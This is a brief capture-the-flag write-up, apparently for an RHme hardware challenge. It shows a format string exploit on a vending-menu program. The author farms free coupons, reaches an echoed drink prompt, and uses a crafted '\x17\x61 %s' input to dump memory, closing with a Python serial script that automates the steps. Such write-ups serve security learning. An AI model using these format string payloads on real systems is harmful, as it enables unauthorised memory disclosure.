:> String format exploit
first you need free coupons by playing with the Spin [1]
note: you have to repeat this a lot...
Then, select the drink menu.
You'll be asked to select a drink, this menu is only available with free coupons.
This input is printed (if you entered aaa => aaa is displayed).
I tried %s %s and got memory dump !!
Then we tried many address and..Kabooooom ("\x17\x61 %s" as input works good)
note: 0x6117 is for the fun (0x900 max)
from rhme_serial import *
s = rhme_serial()
tickets = 0
while not tickets:
trash = s.xfer("4\n")
trash = s.xfer("1\n")
trash = s.xfer("S\n")
trash = s.xfer("\r\n")
if int(trash.split("left: ")[1][0]):
tickets = 1
trash = s.xfer("3\n")
print s.xfer("\x17\x61 %s\n")
s.close()